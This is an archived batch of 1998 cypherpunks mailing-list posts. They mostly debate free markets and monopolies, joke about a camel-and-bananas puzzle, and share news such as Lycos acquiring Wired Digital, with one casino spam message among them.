             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 5 Oct 1998 12:43:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license'
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <3619125B.79B9DEEA@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Werner Koch wrote:
> 
> Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de> writes:
> 
> > I think it all depends upon the free will of the authors of the codes
> > to determine under exactly what conditions other people may share their
> > intellectual properties without paying money. The one may impose
> > some non-monetary conditions in the hope of achieving some
> > non-monetary effects in exchange of the work that has been done, while
> 
> Please read the GPL before talking about it!
> 
> The GPL covers freedom and not price.

I suppose you misunderstood me. Did I say price? I expressed that 
the context is one for free of charge (without paying money).

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 5 Oct 1998 22:38:15 +0800
To: cypherpunks@Algebra.COM
Subject: Re:
In-Reply-To: <199810042112.XAA11806@replay.com>
Message-ID: <3.0.5.32.19981005203144.042e9bd0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 11:12 PM 10/4/98 +0200, Anonymous wrote:
>
>At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
>>> There is a desert which is 1000 miles across. There is a camel who can
>carry
>>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
camel
>>> has a total of 3000 bananas to begin with. What is the maximum number of
>>> bananas that the camel can get across to the other side uneaten?
>>
>>My camels don't understand/can't eat fractional bananas.
>
>Why are bananas quantized in the presense of camels?  Is this
>a quantum-computing thing?

No, it's a Perl thing. ]:>

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 5 Oct 1998 14:04:50 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810051855.UAA14551@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:19 PM 10/5/98 +0100, Richard.Bragg@ssa.co.uk wrote:
>Camels eat first and carry afterwards so stuff a thousand bananas down its
>neck and get it to carry 1000 across.  The remaining 1000 are to be left to
>ferment to make a delicious drink for the camel handler who has just
>persuaded a camel to eat 1000 bananas.

You print 1000 certificates for bananas, and require the camel to accept them.
Then you make him carry all 3000 across the desert.  Then you print three
million
certificates, and declaring his certificates devalued, hand him three
bananas, one of which you keep as income tax.  You also keep half a banana
in banana-transfer-taxes.










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 6 Oct 1998 01:32:58 +0800
To: cypherpunks@Algebra.COM
Subject: Re: US Rights Violations
In-Reply-To: <199810060346.XAA01265@camel8.mindspring.com>
Message-ID: <v03130304b23f684e0120@[209.133.20.44]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:38 PM -0700 10/5/98, John Young wrote:
>We offer Amnesty International's devastating critique
>of US human rights violations, due to be released
>in hardcopy tomorrow:
>
>   http://jya.com/usa-rfa.htm  (365K)
>
>It recounts in voluminous, documented, gruesome detail
>what American justice is truly like in prisons, jails, precinct
>houses, on the highways and in the streets.
>
>After this it's going to difficult for the US to preach human
>rights violations to other countries.

By the way, "The New Yorker" on the newstands has a major article by
Seymour Hersh explaining why many experts think the U.S. bombing of the
"nerve gas factory" [sic] in Khartoum was unjustified, and the bombings of
the Afghan sites were unproductive (even if possibly more justifiable).

And there was a report I saw flying by on this list or on the Usenet to the
effect that several of the top military commanders who should have been
consulted were not, and that Louis Freeh, who was in Nairobi on the
investigation, was not consulted. (I don't know how credible this report
is.)'

Many nations have condemned the "cowboy antics." (Normally I'm not too
sympathetic to charges that the U.S. is behaving like a "cowboy," but in
this case it appears to be an apt description.)

If it turns out that Clinton acted rashly to escape his own Cigargate
problems, and that the normal chains of command were bypassed, then his
head will really roll.

We may have to actually hang the fucker for high treason. (Though I guess
the new PC method is lethal injection.)

The "Wag the Dog II" war in Albania (coincidence?) is just icing on the cake.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 5 Oct 1998 22:56:03 +0800
To: cypherpunks@toad.com
Subject: US Rights Violations
Message-ID: <199810060346.XAA01265@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We offer Amnesty International's devastating critique
of US human rights violations, due to be released
in hardcopy tomorrow:

   http://jya.com/usa-rfa.htm  (365K)

It recounts in voluminous, documented, gruesome detail 
what American justice is truly like in prisons, jails, precinct 
houses, on the highways and in the streets.

After this it's going to difficult for the US to preach human 
rights violations to other countries.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Mon, 5 Oct 1998 09:06:50 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets...
In-Reply-To: <199810050453.XAA01444@einstein.ssz.com>
Message-ID: <3.0.5.32.19981006000836.0087fd40@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 11:53 PM 10/4/98 -0500, Jim Choate wrote:
>Milton Friedman won the Nobel price in 1976 in economics. One of the
>questions he asked was:
>
>Do corporate executives, provided they stay within the law, have
>responsibilities in their business activities other than to make as much
>money for their stockholders as possible?
>
>His answer was 'no', they have no responsibility outside of those two
>considerations (ie the law, stockholders expectations of profit).
>
>Now in a free-market, by definition, there is no law. What then is the
>responsibility of businesses other than the pure unadulterated pursuit of
>profit? If this includes lying, denying consumers information, etc. what
>harm is done, they have fulfilled their responsibility to their shareholders
>(potentialy quite lucratively) and broken no law. Within this environment it
>follows that a primary strategy for such executives is the elimination of
>*all* competition. And since there is no law other than the measure of profit
>all can be justified.

Just because he won a Nobel prize does not mean he was correct, it means
those bestowing the prize on him agreed with him.

business/economic right vs wrong is a different game from
moral right vs wrong.

for instance, suppose there was a great demand for analog watches with
luminous dials. would it be right to flood the market with luminous dials
that were also highly radioactive, because those isotopes were less
expensive than luminous substances that were not radioactive? (this
presupposes that no rules were broken AFA selling watches with radioactive
luminous dials).

are you saying that the proper business solution is to throw public safety
to the wind, and never mind possible consequences of wrist cancer 10 or 20
years down the road? what would the companies bottom line be after the
ravages of the eventual class action suit?

Reeza!

	
"I'm desperately trying to figure out why kamikaze pilots wore helmets."
						- Dave Edison




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 6 Oct 1998 02:53:19 +0800
To: Raccoon <cypherpunks@toad.com
Subject: Re: camels and bananas, for some reason.
In-Reply-To: <3.0.5.32.19981005190213.00845510@205.83.192.13>
Message-ID: <3.0.5.32.19981006004529.00827b20@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:21 PM 10/5/98 +0200, Raccoon wrote:
>On Mon, 5 Oct 1998, Reeza! wrote:
>
>> At 11:12 PM 10/4/98 +0200, Anonymous wrote:
>> >At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
>> >>> There is a desert which is 1000 miles across. There is a camel who can
>> >carry
>> >>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
>> camel
>> >>> has a total of 3000 bananas to begin with. What is the maximum number of
>> >>> bananas that the camel can get across to the other side uneaten?
>> 
>> Are we stipulating that the camel will travel in a straight line?
>> Or will it meander a bit, following the path of least resistanct through
>> the dunes?
>
>Since we are looking for the best possible result (=the most bananans
>moved to the other side), we must assume that the path of least resistance
>equals a straight line. This may be improbable, but it is not impossible!
>Remember that this is maths, and that we're looking for the best possible
>limit.

No, this isn't maths, this is camels, and they'll give you as much
resistance as they feel like, and *you* may be looking for the most
bananas moved across the desert, but the camel's perfectly happy to
sit here and eat all the bananas here, crossing 0 miles of desert,
or dump you 50 miles out in the desert and come back and eat the
bananas.

But other than the PERL book, what's it got to do with cypherpunks?
Just that bananas are related to Bill Clinton?

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Neels Kriek" <kriek@bigfoot.com>
Date: Tue, 6 Oct 1998 01:14:22 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: Camel
Message-ID: <002201bdf0f0$a4e61000$92060cd1@alien>
MIME-Version: 1.0
Content-Type: text/plain



OK, here is my solution ;)

Load 1000 bananas on the camel. Make him walk 990 miles. 10 banana left.
Get 10 unemployed people.  Make them carry 200 bananas each.  Since no-one
can eat more than 1 banana per 10 miles(at a sustained rate anyways) make
them walk 990 miles.  1010 bananas left.  Load 990 on the camel. Each guy
has 1 banana left for the last 10 miles.  Camel eats 10 bananas on last 10
miles. QED 990 bananas on the other side.

or

Make camel walk a mile.  Make him stop.  Walk back and carry all 2000
bananas left to current spot.  Put one banana on camel to get 1000 again.
Make him walk 1 mile again and repeat. At other side unload 999(or 1000 if
you were clever enough to carry the extra one that the camel eats on the
last mile in your pocket) bananas. Leave one on the camel for the mile back.
Walk camel back a mile .  load 1000 bananas.  Unload 999 bananas. You should
now have 1998 bananas.

or

Buy a damned 4X4.  We all know camels don't like bananas and would rather
bite you than carry 1000 of them.

Regards ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gambler@msn.com
Date: Tue, 6 Oct 1998 00:56:47 +0800
To: <cypherpunks@toad.com>
Subject: Best online casino odds
Message-ID: <199810060540.WAA14966@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
The best odds and easy cashier options at any online casino is 
at:
<P>&nbsp;<A 
HREF="http://www.starluck.com/cgi-win/ad/merchants.exe/vendor-a30
4">Virtual
Casino</A>
<BR>Great games, graphics, and sound too.</HTML>
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 6 Oct 1998 03:48:56 +0800
To: Martinus Luther <mhahn@tcbtech.com>
Subject: RE: importance of  motivation
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8489@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Mark Hahn wrote:

>>using your head to think any thoughts we don't want thank. Good Drugs 
>>keep you addicted to your job, your country, your government, your boss. 
>>The Best Drug is the mortgage.

> If you want to condemn the whole damn system we call society, 
> then the "Best Drug" is to have children. See if that doesn't 
> change your perspective a bit.

But the poster mentioned a daughter...

Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>"Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 6 Oct 1998 08:22:43 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810061253.HAA07347@einstein.ssz.com>
Message-ID: <199810061322.GAA05777@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > I do have trouble with the idea of the garment industry
> > being monopolistic. About 2 miles from where I'm typeing
> > this, in  Whitechapel and Spitalfields in the East End of
> > London, street after street is packed with small
> > sweatshops, "import export" businesses, tiny fashion 
> > houses 

Jim Choate:
> Could you get a phonebook and make a list of the
> sweatshops. Enumerate them and then select 10% (if that
> isn't too many) and find out how many and to whom they sew
> their garments for?

They sew for fashion houses, and there are more fashion
houses than anyone can count.

Even if there was only a single redistributor, there would be
no monopoly, since the cost of entry to the business of
specifying garments, buying them, transporting them, and
reselling them is completely insignificant.

Jim's present day "monopolies" are as utterly fantastic as
his past monopolies. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     AQQ4m5gWiSF/xJOyvQy7KPjabjDdEir3CLICtAtG
     46+3JIjNxZp7bEJXNFOzcCPyLHbMGc054WKXwyqLb
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 6 Oct 1998 06:45:12 +0800
To: Jim Choate <petro@playboy.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8493@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Petro wrote:

[...snip...]

> Other than the Railroads, which have already been shown to
> be a government CREATED monopoly, how was the Aircraft 
> Industry a monopoly? The GARMENT INDUSTRY?
> Come on Jim, "Put Up Or Shut Up".

Jim can look after himself, but the aircraft industry is certainly
monopolistic.  There are only 2 serious players in the market for large
long-haul airliners, Airbus (explicitly founded and subsidised by
government)  and Boeing (probably now turning a real profit  but in the
past cross-subsidised from military spending). Whether or not either of
these firms would now exist without government subsidy is unknowable.
Whether or not the monopolistic situation would exist if there had been
no government subsidy is also unknowable.  

I do have trouble with the idea of the garment industry being
monopolistic. About 2 miles from where I'm typeing this, in  Whitechapel
and Spitalfields in the East End of London, street after street is
packed with small sweatshops, "import export" businesses, tiny fashion
houses 

[...snip...]

>>All working for about 5 or 6 companies who actlualy marketed and
>> distributed the items. Just get a Dallas Texas phone book for
>> that period (it's a distribution hub for the clothing/garment
industry
>>  even today).

> That is still 5 or 6 companies in competition.

It looks as if the only monopolies you recognise are global ones where
one big company supplies most of the market for some good, worldwide.
At that level there are damn few monopolies - MS, Boeing, the Murdoch
empire. But a monopolistic situation develops when one supplier, or a
group of suppliers in cartel can control the market in some locality.
Like the breweries in Britain a few years back - there were (and are)
hundreds of breweries but the "big six" had carved up large areas of the
country between them. So if you went to a bar in one area you got
Watney's beer, in another, Bass.   

The real problem with monopoly or cartel is not high prices - many
monopolies choose to charge low prices - it is lack of freedom.  A
monopolisitic supplier of some good has a measure of political power.
They can make people behave in ways they might not otherwise behave. A
monopolisitic employer of labour has *huge* political power.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 07:37:40 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Garment industry.....
Message-ID: <199810061240.HAA07266@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Sorry, I'm going to have to back out for the next few days because of work
load (I've barely had time to read all the traffic), but ...

To answer a qeuestion about the garment industry being monopolistic.

Go back, read the original post on that issue *AGAIN*. Pay particular
attention to the *PERIOD OF TIME I SPECIFICALY MENTIONED*. If you actualy
read it all the way through, and slowly so you can comprehend it, you will
find that your protestations about the industry being monopolistic *today*
are irrelevant. My point was focused on 60-80 years *IN THE PAST*. In
particular the 1920's and 30's. (If you're going to scream "foul", at least
be at the correct yard line on the field)

My mention of the phone book implied you'd have to go to the library and get
a *PERIOD* phonebook (that was my mistake, any true anarcho-capitalist or
free-market maven is not likely to actualy use real-world examples - they're
so messy). And yes, they had phones then, you could even have them in any
color as long as it was black.

Though the point *CAN* be made that even today sweatshops are continouly
being found in places like Los Angeles, Houston, Chicago, etc. Just check
your local newspaper. The reason that these are important is that they are
indicators of a tendency of manufacturers to cut costs/overhead to the bone
when left to their own wiles. This is a *VERY* negative indicator for those
who feel that even an unregulated garment industry can exist in a regulated
market, let alone a free-market.

Again, businesses are run by people with the express intent of making money,
in many cases at whatever cost to their employees and society as a whole.
With this sort of psychological tendency the argument that free-markets will
work is flawed. A commen comment in business classes and boardrooms today is
to 'dominate the market'. That means *eliminate competition*. *THAT* means
create a monopoly if at all possible and the laws to the contrary (which I
hae yet to see anyone bring up a priori in these situations) be damned. Of
course it should be pointed out that it's good legal and business practice
*NOT* to mention these so that it can't be used against one as a
premeditated intent. Something Microsoft seems to have forgotten in their
raft of internal memo's about specificaly kludging DrDos.

Another point I made several weeks to a couple of months ago regarded
companies who *help* their competition in order to limit their ability to
enter into specific markets as competitors seems to have born fruit. Over
the last few weeks several internal documents from Microsoft were released
(check the CNN and other archives) which seem to indicate a clear intent by
Microsoft to *help* Novell and Apple with technology with the express intent
of keeping them out of niche or target markets as competitors. Economic
slight of hand...

Course that isn't going to stop you from wailling for the dead (though could
you keep it down so I can sleep since the temperature around here has
finaly broken and it's not 90F at midnite).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 07:49:12 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810061253.HAA07347@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Brown, R Ken" <brownrk1@texaco.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Tue, 6 Oct 1998 06:37:43 -0500 

> I do have trouble with the idea of the garment industry being
> monopolistic. About 2 miles from where I'm typeing this, in  Whitechapel
> and Spitalfields in the East End of London, street after street is
> packed with small sweatshops, "import export" businesses, tiny fashion
> houses 

This is perfect if you don't mind being a participant...

Could you get a phonebook and make a list of the sweatshops. Enumerate them
and then select 10% (if that isn't too many) and find out how many and to
whom they sew their garments for?

> It looks as if the only monopolies you recognise are global ones where
> one big company supplies most of the market for some good, worldwide.
> At that level there are damn few monopolies

Remember, you can't dominate a market that can't be saturated and you can't
saturate a local market unless you find a mechanism to keep outside
competition from moving in. Currently this is only possible in very strongly
regulated markets in control economies. This implies that, at least today
because of communications and transportation improvement, only markets that
are global (though it might also work on a national level) can be dominated.
That is an interesting aspect I hadn't hit on so far. I'll add it to the mix
and see what brews up...

Though, it does occur to me that the fact that OS/2 has a stronger faction
in Europe than in N. and S. America in relation to Microsoft may be an
indication that continental saturation is possible. Might be explained by
the fact that most businesses are continental and not international in scope
of sales.

I've got to go back to work now...I'll check in as I get the chance...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 08:13:21 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Another potential flaw in current economic theory...
Message-ID: <199810061317.IAA07423@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It occurs to me that there is another potential flaw in current economic
theory and business practice.

Currently (ala Friedmann) the parties that reap the benefit of a succesful
business are the shareholders, this is currently seen to exclude the
employees in many cases/companies.

This approach undervalues the business worth of the employees commitment to
the business.

A more reasonable approach (and one that might make free-markets more
workable, though not by itself) is to consider the employees shareholders
even if they don't hold a single piece of stock. And no, their paychecks are
not sufficient.

Consider, another way to look at a business' goals is "to make every
shareholder a millionare so they don't have to work at anything else". What
business do you know has the specific goal of making their employees (all
the way down to the janitor) sufficiently wealthy from their commitment to
the business so that at some point they don't have to work any more either
(and we are NOT talking about some measly 401k retirement program)?

What would the impact be to the current business models if we include this
axiomaticaly?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 08:15:04 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Free Market Monopolization Theory...
Message-ID: <199810061319.IAA07486@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Here is the note that I made regarding the saturation of free market
economies.

Note that this is several months old and I haven't been diligent in keeping
it fully up to date...

Forwarded message:

> X-within-URL: http://einstein/ravage/free.market.monopolization.html

> This is the theory in its current working version:
> 
> An unregulated (free-market) economy will inherently monopolize when, but
> not necessarily only if, the following are present:
> 
>  -  the commen assumption by current free market models that consumers
>     are rational is irrational. A consideration of succesful marketing
>     mechanisms and human psychology will clearly demonstrate that
>     consumers are at best partialy rational. This is the fault in all
>     anarchy models (eg crypto-anarchy), they assume in an axiomatic
>     fashion that all participants will cooperate for not only their
>     individual best interest but the cooperatives best interest without
>     sufficient recognition that these may in many cases be in conflict.
>     It is the same failing every form of government without a clear and
>     proscribed list of individual and state rights and limits has, the
>     assumption that some minimal set of behaviours or goals will satisfy
>     all participants in all cases. The theory 'What is best for all is
>     best for the one' is false.
> 
>  -  the importance of cooperation for mutual benefit that is axiomatic
>     in current free market theories is false. Mathematicaly the prisoners
>     paradox provides maximum payoff when defection occurs at a relatively
>     high rate and in a random pattern. A primary goal of any business is
>     not to ensure the survival of itself and it competitors but rather to
>     eliminate competition through more succesful strategies. A rational
>     consumer will act irrationaly at times because it is in their long
>     term best interest. Therefore the distinction between rational and
>     irrational consumers is false.
> 
>  -  the market is saturated, in other words the number of consumers at
>     any given time are equal to or less than the service providers ability
>     to provide that service (or resource). This means the long-term survival
>     of firms is a function of retained market share and raw resource share
>     control/ownership.
> 
>  -  the technology and/or start-up costs are high in material and
>     intellectual factors. This minimizes the potential for new providers
>     to start up. Providers will also require non-disclosure and other
>     mechanisms to reduce sharing of information and cross-communications
>     except under controlled conditions. Expect an increase in certifications
>     and implimentation standards required to do business with the more
>     succesful of these providers.
> 
>  -  an individual or small group of service providers have a small but
>     distinct efficiency advantage in technology, manufacturing, or
>     marketing. Over a long-enough time this market advantage will grow
>     and as a result widen the 'technology gap' between firms.
> 
>  -  expect the most efficient firms to share their profit with the
>     critical intellectual contributors. This further reduces the
>     problem of cross-communication and new provider start-up.
> 
>  -  expect to see the more successful providers to join in co-ops with
>     the less succesful providers. This will be under the surreptitous
>     goal of 'developing technology'. It's actual goal will be to cause
>     these smaller firms to commit resources to such enterprises. As soon
>     as it is strategicaly advantagous the primary providers will break-off
>     the co-op. This has the effect of further reducing the ability of the
>     smaller providers to react in a timely manner to market changes or
>     develop new technology due to resource starvation.
> 
>  -  expect to see the less efficient providers to combine in an effort
>     to reap the benefits of shared market share and resources. Unless
>     this partnering provides a more efficient model and there is sufficient
>     time for that efficiency to develop these new providers will eventualy
>     fail or be joined with other providers.
> 
>  -  expect to see the primary provider buy those less efficient providers
>     that don't fail completely. These purchases will be as a result of
>     some new or unexpected technology that will significantly increase
>     the market share of the primary provider -or- it will be with the
>     goal of eliminating this secondary technology and forcing those
>     market shares to do without or use the primary providers technology.
> 
>  -  initialy prices for services will be low to promote purchasing but
>     as providers obtain larger market shares their prices will increase
>     over time and out of step with inflation and other market forces in
>     order to widen the profit gap. The strategy is one of 'use it or
>     starve'.
> 


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Tue, 6 Oct 1998 10:40:03 +0800
To: ignition-point@majordomo.pobox.com
Subject: Lycos Acquires Wired Digital
Message-ID: <199810061540.IAA20105@hardly.hotwired.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.wired.com/news/news/business/story/15437.html

Lycos Acquires Wired Digital 
6:00 a.m.  6.Oct.98.PDT

In a move that continues the trend of consolidation in the Internet
industry, Web search and community firm Lycos has acquired Wired Digital,
the parent company of Wired News, for approximately US$83 million in Lycos
stock. Lycos said in a statement that the combined traffic of both
companies will allow Lycos, already the second most visited Web index
service, to reach more than 40 percent of Web users. 

Tuesday's acquisition coincides with the introduction of "The Lycos
Network," a collection of service, news, and community sites that now
includes Wired Digital properties Wired News, the HotBot search engine, and
the Webmonkey developer site, in addition to existing Lycos sites
Lycos.com, WhoWhere, Tripod, and others. 

According to Relevant Knowledge, Wired Digital attracts nearly five million
unique visitors a month. 

The acquisition is scheduled to close by the end of the calendar year and
is subject to Wired shareholder approval. Lycos (LCOS) will also assume
Wired Digital's stock option plan. 

Under the deal, Wired Digital will continue to operate from its San
Francisco, California, office as a business unit of Lycos, and Beth
Vanderslice, president of Wired Digital, will report to Lycos CEO Bob Davis. 

The Wired Digital brands will remain distinct operating units of Lycos,
which Lycos said would allow the company to reach multiple Web audience
segments. 

For example, Lycos said in a statement that Wired Digital's HotBot search
engine attracts a "tech-savvy Web veteran," while Lycos.com serves a
broader audience. According to Media Metrix, the two search engines attract
distinct audiences, with only 20 percent overlap between the two. 

The Lycos Network and Wired Digital have already taken steps to share each
other's content and services. Wired News is available on the headline page
of Lycos.com, while Lycos' Angelfire home pages and MailCity e-mail
applications are now being offered to HotBot users. 

Lycos search offers links to HotBot and other Wired Digital properties
through top keyword searches. Further, Webmonkey's Web developer tutorials
and resources will be available to Tripod and Lycos.com homepage communities. 

In May of this year, Wired Ventures, the former parent company of Wired
Digital, sold Wired magazine to Advance Magazine Publishers. 

Copyright (c) 1994-98 Wired Digital Inc. All rights reserved.




James Glave, News Editor, Wired News, http://www.wired.com  (415) 276-8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Tue, 6 Oct 1998 09:48:35 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Another potential flaw in current economic theory...
In-Reply-To: <199810061317.IAA07423@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.981006082517.443C-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 6 Oct 1998, Jim Choate wrote:

> Hi,
> 
> It occurs to me that there is another potential flaw in current economic
> theory and business practice.
> 
> Currently (ala Friedmann) the parties that reap the benefit of a succesful
> business are the shareholders, this is currently seen to exclude the
> employees in many cases/companies.
> 

Actually not.  There are quite a few business that have employees as
shareholders.  Most shares of companies are reasonably priced and
easy enough to get a hold of.  Selling them on the other hand is
not so straightforward.

> This approach undervalues the business worth of the employees commitment to
> the business.

Sounds Marxist to me.  Your percentage of equity in anything is
proportional to the risk level you take.  The employee risks none
of their own capital so cannot legitimately expect to be rewarded
with stock.  The employee is free to leave at any time and thus
discontinue their only investment in the company, their day to day
presense.

Of course that does not preclude the employer from offering stock
as an incentive to long term commitment or as an enticement to stay
when the market takes a downturn etc.  In that case the employee
is then taking a risk -- basically the opportunity cost of moving
to a more lucrative situation (one of which is working for himself
and becoming an "evil robber baron").

> 
> A more reasonable approach (and one that might make free-markets more
> workable, though not by itself) is to consider the employees shareholders
> even if they don't hold a single piece of stock. And no, their paychecks are
> not sufficient.

Hmmmm.  That would work like a charm when it comes to paying dividends.

> 
> Consider, another way to look at a business' goals is "to make every
> shareholder a millionare so they don't have to work at anything else". What
> business do you know has the specific goal of making their employees (all
> the way down to the janitor) sufficiently wealthy from their commitment to
> the business so that at some point they don't have to work any more either
> (and we are NOT talking about some measly 401k retirement program)?

What the business does it hire them so they don't have to risk their
own capital.  Of course the labor/socialist view is that they are
being exploited.  I encourage all workers who think the "from each
according to their abilities to each according to their needs" model
works well to emigrate to Russia.  As PJ O'Rourke says, "there they
boil stones for soup".  Go to China and see what kind of "profit
sharing" deal they will make you.  Better yet, try to become a 
prosperous self-employed person.

> 
> What would the impact be to the current business models if we include this
> axiomaticaly?
> 

Ask Marx.  Apparently you don't think capitalist models work.

jim

More PJ O'Rourke...

"And here is another shock.  Professor Samuelson, who wrote the early
editions [of "Economics"] by himself, turns out to be almost as much of a
goof as my friends and I were in the 1960s.  'Marx was the most
influential and perceptive critic of the market economy ever,' he
says on page seven.  Influential, yes.  Marx nearly caused World War III.
But perceptive?  Samuelson continues: 'Marx was wrong about many things
... but that does not diminish his stature as an important economist.'
Well, what would?  If Marx was 'wrong about many things' *and* screwed
the baby-sitter?"



-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

